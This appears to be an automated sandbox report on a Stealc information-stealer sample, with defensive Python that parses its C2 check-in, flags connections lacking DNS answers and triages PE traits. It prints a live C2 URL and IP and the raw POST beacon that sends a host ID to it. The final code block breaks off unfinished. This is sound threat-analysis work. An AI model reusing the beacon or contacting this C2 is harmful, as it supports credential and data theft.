
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1544273
MD5: 3bdbd89b86e70ca180f24b3acc79bc1f
SHA1: a425bb88b0b48ac5b0af08f31dfa241fcd73385b
SHA256: 13188e8c8ca814a413636036d5fda36f97b41fa969f0e2ac831312bb394cc5bc
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 5248 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3BDBD89B86E70CA180F24B3ACC79BC1F)
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads seven legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware configuration: {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

YARA matches:

Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000003.2053306343.0000000004F40000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2094837133.00000000009AE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 5248 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 5248 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.e40000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata IDS alerts:

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-29T07:54:01.532470+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | TCP


AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.e40000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: http://185.215.113.206/6c4adf523b719729.php | Virustotal: Detection: 16%
Source: http://185.215.113.206/6c4adf523b719729.php. | Virustotal: Detection: 15%
Source: http://185.215.113.206/6c4adf523b719729.php/ | Virustotal: Detection: 17%
Source: http://185.215.113.206/ | Virustotal: Detection: 18%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E59030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E472A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4A2B0 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: my_library.pdbU | source: file.exe, 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2053306343.0000000004F6B000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: my_library.pdb | source: file.exe, file.exe, 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2053306343.0000000004F6B000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E540F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E547C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E41710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E54B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E53B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/6c4adf523b719729.php
Source: global traffic | HTTP traffic detected (no User-Agent header, see the "HTTP GET or POST without a user agent" signature):
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected (C2 check-in; the build value "tale" matches the Botnet field of the extracted configuration):
    POST /6c4adf523b719729.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----KJKJKFCBKKJDGDHIDBGI
    Host: 185.215.113.206
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4b 46 43 42 4b 4b 4a 44 47 44 48 49 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 36 38 44 36 30 37 39 42 41 45 32 33 39 32 34 36 39 36 33 33 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4b 46 43 42 4b 4b 4a 44 47 44 48 49 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4b 46 43 42 4b 4b 4a 44 47 44 48 49 44 42 47 49 2d 2d 0d 0a
    Data Ascii (body, CRLF line endings, 211 bytes):
    ------KJKJKFCBKKJDGDHIDBGI
    Content-Disposition: form-data; name="hwid"

    C68D6079BAE23924696330
    ------KJKJKFCBKKJDGDHIDBGI
    Content-Disposition: form-data; name="build"

    tale
    ------KJKJKFCBKKJDGDHIDBGI--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E462D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
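The check-in POST above is the most reusable network artifact in this report. The following Python is an added example (not Joe Sandbox code and not code from the malware) that parses that request from raw bytes, splits the multipart body into its fields, and flags the traits the report's signatures call out: a POST to an IP-literal host with no User-Agent header and a multipart body carrying hwid and build. The request bytes are the ones shown above, reassembled with CRLF line endings. The gate-path pattern (16 lowercase hex characters followed by .php) is an assumption generalised from this single sample.

```python
"""Parse the Stealc C2 check-in captured in the report and flag its traits.

Added example, not code from Joe Sandbox or from the malware. Standard library only.
"""
import re

# The POST exactly as the report shows it (headers and 211-byte multipart body),
# reassembled with CRLF line endings.
STEALC_CHECKIN = (
    b"POST /6c4adf523b719729.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----KJKJKFCBKKJDGDHIDBGI\r\n"
    b"Host: 185.215.113.206\r\n"
    b"Content-Length: 211\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"------KJKJKFCBKKJDGDHIDBGI\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n'
    b"\r\n"
    b"C68D6079BAE23924696330\r\n"
    b"------KJKJKFCBKKJDGDHIDBGI\r\n"
    b'Content-Disposition: form-data; name="build"\r\n'
    b"\r\n"
    b"tale\r\n"
    b"------KJKJKFCBKKJDGDHIDBGI--\r\n"
)

# Assumption: the gate path shape (16 lowercase hex chars + .php) is generalised
# from this one sample; adjust if other builds use a different naming scheme.
GATE_PATH = re.compile(r"/[0-9a-f]{16}\.php")
IPV4_LITERAL = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?")


def parse_http_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].decode("ascii").split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_multipart(body, content_type):
    """Return {field name: value} for a multipart/form-data body."""
    match = re.search(r'boundary="?([^";]+)"?', content_type)
    if not match:
        raise ValueError("multipart body without a boundary parameter")
    delimiter = b"--" + match.group(1).encode("latin-1")
    fields = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):          # closing delimiter "--boundary--"
            break
        part_head, _, part_body = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', part_head)
        if name:
            fields[name.group(1).decode("latin-1")] = part_body.rstrip(b"\r\n").decode("latin-1")
    return fields


def flag_stealc_checkin(raw):
    """Return (multipart fields, list of reasons) for a raw request."""
    method, path, headers, body = parse_http_request(raw)
    reasons = []
    if method == "POST" and GATE_PATH.fullmatch(path):
        reasons.append("POST to a 16-hex-char .php gate")
    if "user-agent" not in headers:
        reasons.append("no User-Agent header")
    if IPV4_LITERAL.fullmatch(headers.get("host", "")):
        reasons.append("Host is an IP literal (no DNS resolution needed)")
    if headers.get("content-length") != str(len(body)):
        reasons.append("Content-Length does not match body (truncated capture?)")
    fields = {}
    if headers.get("content-type", "").startswith("multipart/form-data"):
        fields = parse_multipart(body, headers["content-type"])
        if {"hwid", "build"}.issubset(fields):
            reasons.append("multipart body with the hwid and build check-in fields")
    return fields, reasons


if __name__ == "__main__":
    for reason in flag_stealc_checkin(STEALC_CHECKIN)[1]:
        print("-", reason)
```

Running the module prints the four reasons for the captured request; the hwid value is what the C2 uses to identify the victim host, and the build value is the same "tale" string the configuration extractor reports as the Botnet field. Any one of these traits alone is weak (plenty of legitimate clients POST to IP literals), so a detection should require the combination, as the Suricata rule quoted in this section does.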
Source: file.exe, 00000000.00000002.2094837133.00000000009AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2094837133.0000000000A08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2094837133.00000000009AE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094837133.0000000000A08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.2094837133.0000000000A08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php.
Source: file.exe, 00000000.00000002.2094837133.0000000000A08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
Source: file.exe, 00000000.00000002.2094837133.0000000000A08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpZ
Source: file.exe, 00000000.00000002.2094837133.0000000000A08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpj
Source: file.exe, 00000000.00000002.2094837133.0000000000A08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/m
Source: file.exe, 00000000.00000002.2094837133.0000000000A08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/ws
Source: file.exe, file.exe, 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2053306343.0000000004F6B000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
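The "TCP traffic detected without corresponding DNS query" indicator in this section is worth reproducing outside the sandbox, because a hard-coded C2 address is exactly what an analyst can hunt for in their own captures. The following Python is an added example (not Joe Sandbox code) of that logic: it walks DNS responses and new TCP connections in timestamp order and flags any connection to an external address that no still-valid DNS answer explains. The event records are constructed here and modelled on the report's 192.168.2.5 to 185.215.113.206 flows; 192.168.2.1 (a gateway/resolver) and 203.0.113.10 (an RFC 5737 documentation address) are placeholders.

```python
"""Flag TCP connections to external IPs that no DNS answer in the capture explains.

Added example reproducing the logic behind the report's "TCP traffic detected
without corresponding DNS query" indicator; not Joe Sandbox code. Event records
are constructed here; 192.168.2.1 and 203.0.113.10 are placeholder addresses.
"""
import ipaddress
from collections import Counter, namedtuple

# kind: "dns" = a DNS response (qname, answers, ttl); "tcp" = a new connection src -> dst
Event = namedtuple("Event", "ts kind src dst qname answers ttl")

# Destinations that never need a DNS answer to be "explained" (RFC 1918, loopback,
# link-local, multicast, broadcast). Listed explicitly instead of using
# ip.is_global so that documentation ranges such as 203.0.113.0/24 count as external.
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "224.0.0.0/4", "255.255.255.255/32")]


def is_local(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in LOCAL_NETS)


def dns_gap_connections(events):
    """Return [(ts, dst, reason)] for TCP connections to external hosts whose
    destination IP was not returned by a DNS answer that is still within its TTL."""
    valid_until = {}  # ip -> (expiry ts, qname)
    hits = []
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.kind == "dns":
            for ip in ev.answers:
                valid_until[ip] = (ev.ts + ev.ttl, ev.qname)
        elif ev.kind == "tcp" and not is_local(ev.dst):
            known = valid_until.get(ev.dst)
            if known is None:
                hits.append((ev.ts, ev.dst, "no DNS answer for this IP"))
            elif ev.ts > known[0]:
                hits.append((ev.ts, ev.dst, f"DNS answer for {known[1]} expired"))
    return hits


def summarize(hits):
    """Collapse per-connection hits into {dst: count}, the way the report counts them."""
    return dict(Counter(dst for _ts, dst, _reason in hits))


SAMPLE_EVENTS = [  # constructed capture
    Event(10.0, "dns", "192.168.2.5", "192.168.2.1", "update.example.net", ["203.0.113.10"], 300),
    Event(10.2, "tcp", "192.168.2.5", "203.0.113.10", None, None, None),     # resolved: fine
    Event(12.0, "tcp", "192.168.2.5", "185.215.113.206", None, None, None),  # hard-coded C2
    Event(12.5, "tcp", "192.168.2.5", "185.215.113.206", None, None, None),
    Event(13.0, "tcp", "192.168.2.5", "192.168.2.1", None, None, None),      # local, ignored
    Event(900.0, "tcp", "192.168.2.5", "203.0.113.10", None, None, None),    # TTL long expired
]

if __name__ == "__main__":
    for ts, dst, reason in dns_gap_connections(SAMPLE_EVENTS):
        print(f"{ts:7.1f}  {dst:16}  {reason}")
    print(summarize(dns_gap_connections(SAMPLE_EVENTS)))
```

The TTL-based expiry is what keeps this honest on a long capture: a resolver re-queries after the TTL runs out, so a connection well past it with no new answer in the trace deserves the same scrutiny as one with no answer at all. The main false-positive source is a host that resolved the name before the capture started and is still using its cached answer; a sandbox run avoids that by starting from a clean VM, and on a production sensor you would seed valid_until from a passive-DNS store instead of an empty dict.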

System Summary

Source: file.exe | Static PE information: section names: (blank), .rsrc, .idata, (blank)
Source: C:\Users\user\Desktop\file.exe | Code functions found at: 0_2_00E80098, 0_2_00E9B198, 0_2_00E72138, 0_2_00E84288, 0_2_00EAE258, 0_2_00EBD39E, 0_2_012A32F3, 0_2_00ECB308, 0_2_0129F50A, 0_2_01197577, 0_2_012B5551, 0_2_012A8588, 0_2_011645F0, 0_2_00E845A8, 0_2_00EAD5A8, 0_2_00E64573, 0_2_00E6E544, 0_2_00EC96FD, 0_2_012AD731, 0_2_00E866C8, 0_2_00EBA648, 0_2_012AB604, 0_2_012A6664, 0_2_01202644, 0_2_00EB6799, 0_2_01199697, 0_2_00E9D720, 0_2_012B06F5, 0_2_00EAF8D6, 0_2_00E9B8A8, 0_2_012A196D, 0_2_00E998B8, 0_2_00E94868, 0_2_012AEB33, 0_2_00EA8BD9, 0_2_00EB4BA8, 0_2_00EB0B88, 0_2_00EBAC28, 0_2_00E94DC8, 0_2_00E95DB9, 0_2_00E9BD68, 0_2_00E71D78, 0_2_00EAAD38, 0_2_012A4CC6, 0_2_00EB1EE8, 0_2_0129FF25, 0_2_012B1FA4, 0_2_00E88E78, 0_2_0134CFFA
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00E44610 appears 316 times
Source: file.exe | Static PE information: Section: fgyethhk ZLIB complexity 0.994837749435241
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E59790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E53970 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\RAZ09ANL.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Sections loaded: apphelp.dll, winmm.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 2138112 > 1048576
Source: file.exe | Static PE information: Raw size of fgyethhk is bigger than: 0x100000 < 0x19f000

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.e40000.0.unpack; section rights in memory: (blank):EW, .rsrc:W, .idata:W, (blank):EW, fgyethhk:EW, cbzeryut:EW, .taggant:EW vs. on disk: (blank):ER, .rsrc:W, .idata:W, (blank):EW, fgyethhk:EW, cbzeryut:EW, .taggant:EW (the first, unnamed section changes from ER on disk to EW at runtime, which is what the "Detected unpacking (changes PE section rights)" signature reports)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E59BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x20fcdd should be: 0x20d750
Source: file.exe | Static PE information: section names: (blank), .rsrc, .idata, (blank), fgyethhk, cbzeryut, .taggant
Source: C:\Users\user\Desktop\file.exe | Code obfuscation (push/mov and push/ret sequences), listed as function start: sequence (instruction address):
    0_2_012DC12E: push ebx; mov dword ptr [esp], eax (0_2_012DC17F)
    0_2_00E6A0F2: push eax; retf (0_2_00E6A119)
    0_2_00E6A0DC: push eax; retf (0_2_00E6A0F1)
    0_2_012D514B: push ebp; mov dword ptr [esp], edx (0_2_012D5155)
    0_2_012D514B: push 24B51807h; mov dword ptr [esp], eax (0_2_012D517E)
    0_2_015701FD: push eax; mov dword ptr [esp], 0740B0C2h (0_2_01570252)
    0_2_0137A03C: push 34E4440Ch; mov dword ptr [esp], ebx (0_2_0137A068)
    0_2_0137A03C: push edx; mov dword ptr [esp], 7945E048h (0_2_0137A089)
    0_2_012DF0A7: push ebp; mov dword ptr [esp], 7F5B7441h (0_2_012DF92D)
    0_2_012DD372: push ebp; mov dword ptr [esp], ecx (0_2_012DD3AF)
    0_2_012DD372: push ebp; mov dword ptr [esp], eax (0_2_012DD3BF)
    0_2_013083A6: push edx; mov dword ptr [esp], 5FBFC62Ah (0_2_013083C3)
    0_2_0130E391: push esi; mov dword ptr [esp], edx (0_2_0130E3CF)
    0_2_013693D7: push esi; mov dword ptr [esp], 73DF7040h (0_2_0136940B)
    0_2_013693D7: push 194A9586h; mov dword ptr [esp], esp (0_2_013694C0)
    0_2_013423D2: push 564A00E8h; mov dword ptr [esp], ecx (0_2_0134241E)
    0_2_013722BE: push ecx; mov dword ptr [esp], 7F1D27D9h (0_2_013722EB)
    0_2_013722BE: push 2837B476h; mov dword ptr [esp], eax (0_2_01372332)
    0_2_013722BE: push edi; mov dword ptr [esp], 7FEFA814h (0_2_01372359)
    0_2_013722BE: push eax; mov dword ptr [esp], ebx (0_2_013723D4)
    0_2_00E6A370: push eax; retf (0_2_00E6A39D)
    0_2_01382299: push ecx; mov dword ptr [esp], ebp (0_2_013822B6)
    0_2_011472A6: push edi; mov dword ptr [esp], 0AAC46F4h (0_2_011472BA)
    0_2_011472A6: push 50C8F0C8h; mov dword ptr [esp], ebx (0_2_011472F7)
    0_2_011472A6: push edx; mov dword ptr [esp], ecx (0_2_01147318)
    0_2_01302285: push ecx; mov dword ptr [esp], ebp (0_2_013022AE)
    0_2_00E5B335: push ecx; ret (0_2_00E5B348)
    0_2_012A32F3: push 0C3221CBh; mov dword ptr [esp], esi (0_2_012A32FE)
    0_2_012A32F3: push 7BBC8FB2h; mov dword ptr [esp], esi (0_2_012A3343)
    0_2_012A32F3: push 3CDC09AAh; mov dword ptr [esp], ebx (0_2_012A3351)
    0_2_012A32F3: push eax; mov dword ptr [esp], edx (0_2_012A339B)
Source: file.exe | Static PE information: section name: fgyethhk entropy: 7.9536291120516625
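The static indicators in this section (blank and random section names, writable-and-executable sections, an entry point in .taggant rather than .text, a 7.95-bit entropy section, and a stored checksum of 0x20fcdd where 0x20d750 was expected) can all be recomputed from the file without running it. The following Python is an added example (not Joe Sandbox code) of that triage using only the standard library: a minimal PE32 section-table reader, Shannon entropy per section, the PE checksum algorithm, and the rules that turn those into findings. Because the sample itself is not part of this page, the code runs on a constructed PE32 stub whose section names and rights copy the report's list (contents are filler); the `.text`-only case shows what an unremarkable file looks like.

```python
"""Static PE triage for the indicators in this section: blank or non-standard
section names, writable+executable sections, an entry point outside .text,
high section entropy and a mismatched optional-header CheckSum.
Added example, not Joe Sandbox code; standard library only. It runs on a
constructed PE32 stub whose section names and rights copy the report."""
import math
import struct

SCN_EXECUTE, SCN_READ, SCN_WRITE = 0x20000000, 0x40000000, 0x80000000
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata", ".edata", ".bss", ".tls", ".pdata"}


def shannon_entropy(data):
    n = len(data)                       # bits per byte: 0.0 constant .. 8.0 uniform
    if n == 0:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_checksum(image, checksum_offset):
    """One's-complement 16-bit sum over the file, skipping the CheckSum dword
    itself, plus the file length (the imagehlp CheckSumMappedFile algorithm)."""
    total, padded = 0, image + b"\0" * (len(image) % 2)
    for off in range(0, len(padded), 2):
        if off in (checksum_offset, checksum_offset + 2):
            continue
        total += int.from_bytes(padded[off:off + 2], "little")
        total = (total & 0xFFFF) + (total >> 16)
    total = (total & 0xFFFF) + (total >> 16)
    return (total + len(image)) & 0xFFFFFFFF


def parse_pe(image):
    """Minimal PE32 reader: entry RVA, CheckSum field and the section table."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[:2] != b"MZ" or image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    _, nsect, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, coff)
    opt = coff + 20                      # optional header; AddressOfEntryPoint +16, CheckSum +64
    sections = []
    for i in range(nsect):
        (name, vsize, va, rawsize, rawptr, _, _, _, _,
         chars) = struct.unpack_from("<8sIIIIIIHHI", image, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va,
                         "vsize": vsize, "chars": chars, "data": image[rawptr:rawptr + rawsize]})
    return {"entry_rva": struct.unpack_from("<I", image, opt + 16)[0], "checksum_offset": opt + 64,
            "stored_checksum": struct.unpack_from("<I", image, opt + 64)[0], "sections": sections}


def triage(image):
    """Return human-readable findings; an unremarkable file yields []."""
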